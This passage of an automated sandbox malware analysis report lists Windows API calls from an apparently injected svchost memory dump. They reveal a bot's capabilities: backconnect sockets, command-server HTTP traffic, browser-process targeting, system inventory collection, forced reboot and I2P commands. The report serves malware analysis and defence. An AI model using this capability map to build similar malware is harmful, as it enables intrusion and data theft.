      • Part of subcall function 00EF1D43: WSAGetLastError.WS2_32 ref: 00EF1E26
      • Part of subcall function 00EF1D43: TerminateThread.KERNEL32(?,00000000), ref: 00EF1E37
      • Part of subcall function 00EF1D43: shutdown.WS2_32(?,00000002), ref: 00EF1E45
      • Part of subcall function 00EF1D43: closesocket.WS2_32(?), ref: 00EF1E4E
      • Part of subcall function 00EF1000: WSASend.WS2_32(0000054F,?,00000001,?,00000000,00000000,00000000), ref: 00EF1064
      • Part of subcall function 00EF1000: GetTickCount.KERNEL32 ref: 00EF107F
      • Part of subcall function 00EF1000: WSAWaitForMultipleEvents.WS2_32(00000002,?,00000000,00003A98,00000000,?,?,7C80934A), ref: 00EF109E
      • Part of subcall function 00EF1000: WSAEnumNetworkEvents.WS2_32(0000054F,00000001,?), ref: 00EF10D0
      • Part of subcall function 00EF1000: WSARecv.WS2_32(0000054F,?,00000001,?,?,00000000,00000000), ref: 00EF110C
      • Part of subcall function 00EF1000: WaitForSingleObject.KERNEL32(?,00000010), ref: 00EF1162
      • Part of subcall function 00EF1000: WSAGetLastError.WS2_32(?,?,7C80934A), ref: 00EF1198
      • Part of subcall function 00EF1000: WSAGetLastError.WS2_32(?,?,7C80934A), ref: 00EF11AE
    • shutdown.WS2_32(?,00000002), ref: 00EF154A
    • closesocket.WS2_32(?), ref: 00EF1554
    • WSACloseEvent.WS2_32(?), ref: 00EF155E
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 00EF9B8C
    • GetLastError.KERNEL32(?,?,?,00EF7AD8,00000000), ref: 00EF9B92
    • GetLastError.KERNEL32(?,?,?,00EF7AD8,00000000), ref: 00EF9B98
    • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000008), ref: 00EF9BB2
    • CryptImportKey.ADVAPI32(00000000,00000000,00EF7AD8,00000000,00000000,00EF7AD8), ref: 00EF9BCD
    • CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,00000000), ref: 00EF9BE8
    • CryptHashData.ADVAPI32(00000000,?,00000000,00000000), ref: 00EF9BFA
    • CryptVerifySignatureW.ADVAPI32(00000000,?,?,00EF7AD8,00000000,00000000,?,?,?,00EF7AD8,00000000), ref: 00EF9C12
    • CryptDestroyHash.ADVAPI32(00000000), ref: 00EF9C1D
    • CryptDestroyKey.ADVAPI32(00EF7AD8), ref: 00EF9C26
    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00EF9C30
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EF5632
    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00EF5642
    • lstrcmpiW.KERNEL32(0294FCC4,explorer.exe), ref: 00EF565C
    • OpenProcess.KERNEL32(00000400,00000000,00003672), ref: 00EF5672
    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00EF5684
    • CloseHandle.KERNEL32(00000000), ref: 00EF5697
    • CloseHandle.KERNEL32(00000000), ref: 00EF569F
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • lstrlenW.KERNEL32(000DA910), ref: 00EF574F
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • CreateEnvironmentBlock.USERENV(0294FEBC,00000000,00000000), ref: 00EF57DB
    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000420,FD99905B,00000000,00000044,00000000), ref: 00EF57FA
    • CloseHandle.KERNEL32(00000000), ref: 00EF5825
    • CloseHandle.KERNEL32(00000000), ref: 00EF582A
    • DestroyEnvironmentBlock.USERENV(FD99905B), ref: 00EF5836
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • StrStrIW.SHLWAPI(?,chrome.exe), ref: 00EFD9B1
    • StrStrIW.SHLWAPI(?,firefox.exe), ref: 00EFD9BF
    • StrStrIW.SHLWAPI(?,iexplore.exe), ref: 00EFD9CD
      • Part of subcall function 00EFD54B: EnterCriticalSection.KERNEL32(-00000031,00EFDD09,00000000,00000000), ref: 00EFD54F
      • Part of subcall function 00EFD559: LeaveCriticalSection.KERNEL32(-00000031,00EFDD78,0000960D,0294FF08,00000000,00000000), ref: 00EFD55D
      • Part of subcall function 00EFD8E7: OpenProcess.KERNEL32(0000043A,00000000,?), ref: 00EFD904
      • Part of subcall function 00EFD8E7: CloseHandle.KERNEL32(00000000), ref: 00EFD921
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF5308: GetCurrentProcess.KERNEL32 ref: 00EF5317
      • Part of subcall function 00EF5308: OpenProcessToken.ADVAPI32(00000000), ref: 00EF531E
      • Part of subcall function 00EF5308: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00EF5339
      • Part of subcall function 00EF5308: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 00EF5356
      • Part of subcall function 00EF5308: CloseHandle.KERNEL32(?), ref: 00EF5361
    • ShellExecuteW.SHELL32(00000000,open,C:\windows\system32\shutdown.exe,/r /f /t 1,00000000,00000000), ref: 00EF5A3E
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • GetLocalTime.KERNEL32(?), ref: 00EF54A7
      • Part of subcall function 00EF544B: GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00EF546B
      • Part of subcall function 00EF544B: GetProcAddress.KERNEL32(00000000), ref: 00EF5472
      • Part of subcall function 00EF544B: SystemTimeToFileTime.KERNEL32(?,?), ref: 00EF5484
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • WSACreateEvent.WS2_32 ref: 00EF2771
    • WSAEventSelect.WS2_32(?,?,00000023), ref: 00EF2789
    • WSAWaitForMultipleEvents.WS2_32(00000003,?,00000000,00001388,00000000), ref: 00EF2822
    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00EF284A
    • WSASend.WS2_32(?,?,00000001,?,00000000,00000000,00000000), ref: 00EF288B
    • WSAGetLastError.WS2_32 ref: 00EF28AA
    • GetTickCount.KERNEL32 ref: 00EF28BB
    • WSARecv.WS2_32(?,?,00000001,?,?,00000000,00000000), ref: 00EF2936
    • WSARecv.WS2_32(?,?,00000001,?,?,00000000,00000000), ref: 00EF2987
    • GetTickCount.KERNEL32 ref: 00EF2998
    • WSAGetLastError.WS2_32 ref: 00EF29C1
      • Part of subcall function 00EF1C5B: EnterCriticalSection.KERNEL32(?), ref: 00EF1C69
      • Part of subcall function 00EF1C5B: LeaveCriticalSection.KERNEL32(?), ref: 00EF1CA6
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00EF2A76
      • Part of subcall function 00EF1BDA: EnterCriticalSection.KERNEL32(?), ref: 00EF1BE5
      • Part of subcall function 00EF1BDA: LeaveCriticalSection.KERNEL32(?,00000000), ref: 00EF1C10
      • Part of subcall function 00EF24B8: EnterCriticalSection.KERNEL32(?,?,00EF23AA,?,?,?), ref: 00EF24BC
      • Part of subcall function 00EF24B8: SetEvent.KERNEL32(?), ref: 00EF250E
      • Part of subcall function 00EF24B8: LeaveCriticalSection.KERNEL32(?), ref: 00EF258A
    • CreateThread.KERNEL32(00000000,00000000,00EF2D66,00000000), ref: 00EF2AEF
    • CloseHandle.KERNEL32(00000000), ref: 00EF2AF6
    • ResetEvent.KERNEL32(?), ref: 00EF2BBA
      • Part of subcall function 00EF2618: EnterCriticalSection.KERNEL32(?,00000000,00EF2323), ref: 00EF261D
      • Part of subcall function 00EF2618: ResetEvent.KERNEL32(?), ref: 00EF2632
      • Part of subcall function 00EF2618: LeaveCriticalSection.KERNEL32(?), ref: 00EF263B
      • Part of subcall function 00EF2594: EnterCriticalSection.KERNEL32(?,00000000,?,00EF2337,?), ref: 00EF259B
      • Part of subcall function 00EF2594: ResetEvent.KERNEL32(?), ref: 00EF25B0
      • Part of subcall function 00EF2594: LeaveCriticalSection.KERNEL32(?,?,00EF2337,?), ref: 00EF25B9
    • WSASend.WS2_32(?,?,00000001,?,00000000,00000000,00000000), ref: 00EF2C20
    • GetTickCount.KERNEL32 ref: 00EF2C41
    • WSAGetLastError.WS2_32 ref: 00EF2C65
    • WSAGetLastError.WS2_32 ref: 00EF2C7F
      • Part of subcall function 00EF1D2A: EnterCriticalSection.KERNEL32(?,00EF1CE3), ref: 00EF1D2E
    • SetEvent.KERNEL32(?), ref: 00EF2CB5
      • Part of subcall function 00EF1D38: LeaveCriticalSection.KERNEL32(?,00EF1D25), ref: 00EF1D3C
    • Sleep.KERNEL32(00000010), ref: 00EF2CD6
    • WSACloseEvent.WS2_32(?), ref: 00EF2CFA
    • shutdown.WS2_32(?,00000002), ref: 00EF2D0A
    • closesocket.WS2_32(?), ref: 00EF2D14
    • shutdown.WS2_32(?,00000002), ref: 00EF2D1B
    • closesocket.WS2_32(?), ref: 00EF2D20
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
      • Part of subcall function 00EF247D: DeleteCriticalSection.KERNEL32(?,71AC0BF6,00EF2D3C), ref: 00EF247F
      • Part of subcall function 00EF247D: CloseHandle.KERNEL32(?), ref: 00EF2488
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF240E: InitializeCriticalSection.KERNEL32 ref: 00EF241D
      • Part of subcall function 00EF240E: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00EF2428
      • Part of subcall function 00EF1B7D: InitializeCriticalSection.KERNEL32(00000018), ref: 00EF1B8F
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • WSACreateEvent.WS2_32 ref: 00EF201D
    • WSAGetLastError.WS2_32 ref: 00EF202C
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • WSAEventSelect.WS2_32(?,?,00000023), ref: 00EF209A
    • WSASend.WS2_32(?,?,00000001,?,00000000,00000000,00000000), ref: 00EF2164
    • WSAGetLastError.WS2_32 ref: 00EF2198
    • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,00000BB8,00000001), ref: 00EF21C7
    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00EF21F7
    • WSASend.WS2_32(?,?,00000001,?,00000000,00000000,00000000), ref: 00EF224B
    • WSAGetLastError.WS2_32 ref: 00EF2283
    • WSARecv.WS2_32(?,?,00000001,?,?,00000000,00000000), ref: 00EF22C4
      • Part of subcall function 00EF2618: EnterCriticalSection.KERNEL32(?,00000000,00EF2323), ref: 00EF261D
      • Part of subcall function 00EF2618: ResetEvent.KERNEL32(?), ref: 00EF2632
      • Part of subcall function 00EF2618: LeaveCriticalSection.KERNEL32(?), ref: 00EF263B
      • Part of subcall function 00EF2594: EnterCriticalSection.KERNEL32(?,00000000,?,00EF2337,?), ref: 00EF259B
      • Part of subcall function 00EF2594: ResetEvent.KERNEL32(?), ref: 00EF25B0
      • Part of subcall function 00EF2594: LeaveCriticalSection.KERNEL32(?,?,00EF2337,?), ref: 00EF25B9
    • WSAGetLastError.WS2_32 ref: 00EF2377
      • Part of subcall function 00EF24B8: EnterCriticalSection.KERNEL32(?,?,00EF23AA,?,?,?), ref: 00EF24BC
      • Part of subcall function 00EF24B8: SetEvent.KERNEL32(?), ref: 00EF250E
      • Part of subcall function 00EF24B8: LeaveCriticalSection.KERNEL32(?), ref: 00EF258A
    • shutdown.WS2_32(?,00000000), ref: 00EF23AE
    • closesocket.WS2_32(?), ref: 00EF23B7
    • WSACloseEvent.WS2_32(?), ref: 00EF23C9
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF62BD: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00EF62CE
      • Part of subcall function 00EF62BD: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EF62EE
      • Part of subcall function 00EF62BD: GetLastError.KERNEL32(?,?), ref: 00EF62FB
      • Part of subcall function 00EF62BD: InternetCloseHandle.WININET(?), ref: 00EF6306
      • Part of subcall function 00EF62BD: SetLastError.KERNEL32(00000000,?,?), ref: 00EF630D
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
      • Part of subcall function 00EF61F3: HttpSendRequestExW.WININET(?,?,00000000,00000000,00000000), ref: 00EF622C
      • Part of subcall function 00EF61F3: InternetWriteFile.WININET(?,?,00000400,00000000), ref: 00EF6267
      • Part of subcall function 00EF61F3: HttpEndRequestW.WININET(?,00000000,00000000,00000000), ref: 00EF6283
    • GetLastError.KERNEL32(?), ref: 00EF634E
    • HttpOpenRequestA.WININET(?,POST,?,00000000,00000000,00000000,04803000,00000000), ref: 00EF63A1
    • InternetCloseHandle.WININET(?), ref: 00EF6509
      • Part of subcall function 00EF5F26: InternetQueryOptionW.WININET(?,0000001F,?,?), ref: 00EF5F3F
      • Part of subcall function 00EF5F26: InternetSetOptionW.WININET(00000004,0000001F,00000380,00000004), ref: 00EF5F57
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF6180: wsprintfA.USER32(?,00EFE4E4,?,00001000,Content-Length: ,00000000,00000000,?), ref: 00EF61CE
    • GetLastError.KERNEL32(?,?), ref: 00EF63E4
    • lstrlenA.KERNEL32(00000000,20000000,?,?,?), ref: 00EF63F5
    • HttpAddRequestHeadersA.WININET(?,00000000,00000000), ref: 00EF6400
    • GetLastError.KERNEL32(?,?,?), ref: 00EF640A
    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00EF643D
    • InternetCloseHandle.WININET(?), ref: 00EF6446
    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00EF645D
    • InternetReadFile.WININET(?,00000000,?,?), ref: 00EF6483
    • InternetReadFile.WININET(?,?,?,?), ref: 00EF64B1
    • HttpQueryInfoW.WININET(?,00000013,?,?,00000000), ref: 00EF64E9
    • StrToIntW.SHLWAPI(?), ref: 00EF64FA
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • GetVersionExW.KERNEL32(?), ref: 00EF3EFA
    • wsprintfA.USER32(00000000,/%s/%s/0/%s/%d/%s/,?,0000001F,?,00000451,?), ref: 00EF3FCA
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
      • Part of subcall function 00EF5165: QueryPerformanceCounter.KERNEL32(00000000), ref: 00EF516E
    • InitializeCriticalSection.KERNEL32(00F03834), ref: 00EFDAA1
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • DeleteCriticalSection.KERNEL32(00F03834,?,00EFD460,00F03688,?,?), ref: 00EFDAB9
    • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00EFDBD8
    • GetProcAddress.KERNEL32(00000000), ref: 00EFDBE1
    • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00EFDBF2
    • GetProcAddress.KERNEL32(00000000), ref: 00EFDBF5
    • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00EFDC06
    • GetProcAddress.KERNEL32(00000000), ref: 00EFDC09
    • GetCurrentProcessId.KERNEL32 ref: 00EFDC10
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF62BD: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00EF62CE
      • Part of subcall function 00EF62BD: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EF62EE
      • Part of subcall function 00EF62BD: GetLastError.KERNEL32(?,?), ref: 00EF62FB
      • Part of subcall function 00EF62BD: InternetCloseHandle.WININET(?), ref: 00EF6306
      • Part of subcall function 00EF62BD: SetLastError.KERNEL32(00000000,?,?), ref: 00EF630D
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • GetLastError.KERNEL32(?,?), ref: 00EF669F
    • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,00000000,04803000,00000000), ref: 00EF66EF
    • StrToIntW.SHLWAPI(?), ref: 00EF67E0
      • Part of subcall function 00EF5F26: InternetQueryOptionW.WININET(?,0000001F,?,?), ref: 00EF5F3F
      • Part of subcall function 00EF5F26: InternetSetOptionW.WININET(00000004,0000001F,00000380,00000004), ref: 00EF5F57
    • HttpSendRequestA.WININET(?,00000000,00000000,00000000,00000000), ref: 00EF6712
    • GetLastError.KERNEL32(?,?), ref: 00EF671C
    • InternetCloseHandle.WININET(?), ref: 00EF6727
    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00EF6740
    • InternetCloseHandle.WININET(?), ref: 00EF67EF
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • InternetReadFile.WININET(?,00000000,?,?), ref: 00EF6768
    • InternetReadFile.WININET(?,?,?,?), ref: 00EF6797
    • HttpQueryInfoW.WININET(?,00000013,?,?,00000000), ref: 00EF67CF
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • lstrcmpA.KERNEL32(?,btid), ref: 00EF73BC
    • lstrcmpA.KERNEL32(?,ccsr), ref: 00EF73DB
    • lstrcmpA.KERNEL32(?,dpsr), ref: 00EF73FA
    • lstrcmpA.KERNEL32(?,btnt), ref: 00EF7419
    • lstrcmpA.KERNEL32(?,slip), ref: 00EF7478
      • Part of subcall function 00EF78E0: lstrlenA.KERNEL32(?,7C830D7C,?,?,00EF7489,?), ref: 00EF78EC
      • Part of subcall function 00EF789C: lstrlenA.KERNEL32(?,7C830D7C,?,?,00EF740E,?,?), ref: 00EF78A8
      • Part of subcall function 00EF785B: lstrlenA.KERNEL32(?,7C830D7C,?,?,00EF73EF,?,?), ref: 00EF7864
      • Part of subcall function 00EF72EB: lstrlenA.KERNEL32(0290AFF4,00F032D0,?,0294FFB4,00EFCFBF,377142_W512600.2A0325090A052E27ABA25890C72BFBD1,00000200), ref: 00EF72F7
    • lstrlenA.KERNEL32(?,?,success), ref: 00EF75DF
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF7374: lstrlenA.KERNEL32 ref: 00EF737A
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
      • Part of subcall function 00EFB6B2: RegOpenKeyW.ADVAPI32(?,?,?), ref: 00EFB6C3
      • Part of subcall function 00EFB6B2: RegCloseKey.ADVAPI32(?), ref: 00EFB714
    • lstrlenW.KERNEL32(==General==), ref: 00EFC0F0
      • Part of subcall function 00EFC076: lstrcpyW.KERNEL32(00000000,no CPU info), ref: 00EFC08B
    • lstrlenW.KERNEL32(00000000), ref: 00EFC10E
    • lstrlenW.KERNEL32(==Users==), ref: 00EFC137
      • Part of subcall function 00EFC095: lstrcpyW.KERNEL32(00000000,no users info), ref: 00EFC0AA
    • lstrlenW.KERNEL32(00000000), ref: 00EFC156
      • Part of subcall function 00EFB5D0: lstrlenW.KERNEL32 ref: 00EFB5F2
      • Part of subcall function 00EFB5D0: lstrlenW.KERNEL32(DisplayName), ref: 00EFB629
    • lstrlenW.KERNEL32(==Programs==), ref: 00EFC1A4
    • lstrlenW.KERNEL32(==Services==), ref: 00EFC1EA
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • CreateFileW.KERNEL32(\\.\pipe\2f1e5f214354r,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00EF69D7
    • Sleep.KERNEL32(00000032), ref: 00EF69E9
    • WriteFile.KERNEL32(00000000,00026538,00000114,0294FE98,00000000), ref: 00EF6A09
    • CloseHandle.KERNEL32(00000000), ref: 00EF6A14
    • GetTickCount.KERNEL32 ref: 00EF6A28
    • GetTickCount.KERNEL32 ref: 00EF6A34
    • Sleep.KERNEL32(00000010), ref: 00EF6A42
    • ReadFile.KERNEL32(0294FED4,FFFECD63,00000400,0294FEA4,00000000), ref: 00EF6A54
    • CloseHandle.KERNEL32(0294FED4), ref: 00EF6A65
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000000), ref: 00EF1D63
    • inet_addr.WS2_32(?), ref: 00EF1D7D
    • htons.WS2_32(?), ref: 00EF1D8B
    • WSAConnect.WS2_32(?,?,00000010,00000000,00000000,00000000,00000000), ref: 00EF1DA2
    • CreateThread.KERNEL32(00000000,00000000,00EF273A,00000000), ref: 00EF1DD2
    • SetThreadPriority.KERNEL32(00000000,00000002), ref: 00EF1DE2
    • WSASend.WS2_32(00000000,?,00000001,?,00000000,00000000,00000000), ref: 00EF1E1B
    • WSAGetLastError.WS2_32 ref: 00EF1E26
    • TerminateThread.KERNEL32(?,00000000), ref: 00EF1E37
    • shutdown.WS2_32(?,00000002), ref: 00EF1E45
    • closesocket.WS2_32(?), ref: 00EF1E4E
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • WSASend.WS2_32(0000054F,?,00000001,?,00000000,00000000,00000000), ref: 00EF1064
    • GetTickCount.KERNEL32 ref: 00EF107F
    • WSAWaitForMultipleEvents.WS2_32(00000002,?,00000000,00003A98,00000000,?,?,7C80934A), ref: 00EF109E
    • WSAEnumNetworkEvents.WS2_32(0000054F,00000001,?), ref: 00EF10D0
    • WSARecv.WS2_32(0000054F,?,00000001,?,?,00000000,00000000), ref: 00EF110C
    • WaitForSingleObject.KERNEL32(?,00000010), ref: 00EF1162
    • WSAGetLastError.WS2_32(?,?,7C80934A), ref: 00EF1198
    • WSAGetLastError.WS2_32(?,?,7C80934A), ref: 00EF11AE
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • lstrcmpA.KERNEL32(?,AUTOBACKCONN), ref: 00EFC9CF
    • lstrcmpA.KERNEL32(?,I2P_EVENT), ref: 00EFCA18
    • lstrcmpA.KERNEL32(?,I2P_NODESTAT), ref: 00EFCA39
      • Part of subcall function 00EF388A: lstrlenA.KERNEL32(00000000,00000000,00000000,00F032D0,0294FF38,00EFC3DC,02908008,m_i2p32,0294FF1C), ref: 00EF389B
      • Part of subcall function 00EF388A: lstrlenA.KERNEL32(00F03560), ref: 00EF38A2
      • Part of subcall function 00EF388A: wsprintfA.USER32(00000000,%s/%s/0,00000000,00F03560), ref: 00EF38C1
      • Part of subcall function 00EFBDCF: CreateThread.KERNEL32(00000000,00000000,?,?), ref: 00EFBDE7
      • Part of subcall function 00EFBDCF: CloseHandle.KERNEL32(00000000), ref: 00EFBDF2
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • InternetOpenA.WININET(00EFE2C0,00000000,00000000,00000000,00000000), ref: 00EFB452
    • InternetOpenUrlA.WININET(00000000,http://icanhazip.com,00000000,00000000,00000000,00000000), ref: 00EFB46D
    • InternetReadFile.WININET(00000000,0294FAE4,00000418,0294FF10), ref: 00EFB4A3
    • inet_addr.WS2_32(0294FAE4), ref: 00EFB4CA
    • InternetCloseHandle.WININET(00000000), ref: 00EFB504
    • InternetCloseHandle.WININET(00000000), ref: 00EFB50D
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • lstrlenA.KERNEL32(A5AE484D,02908008,00000000), ref: 00EF3474
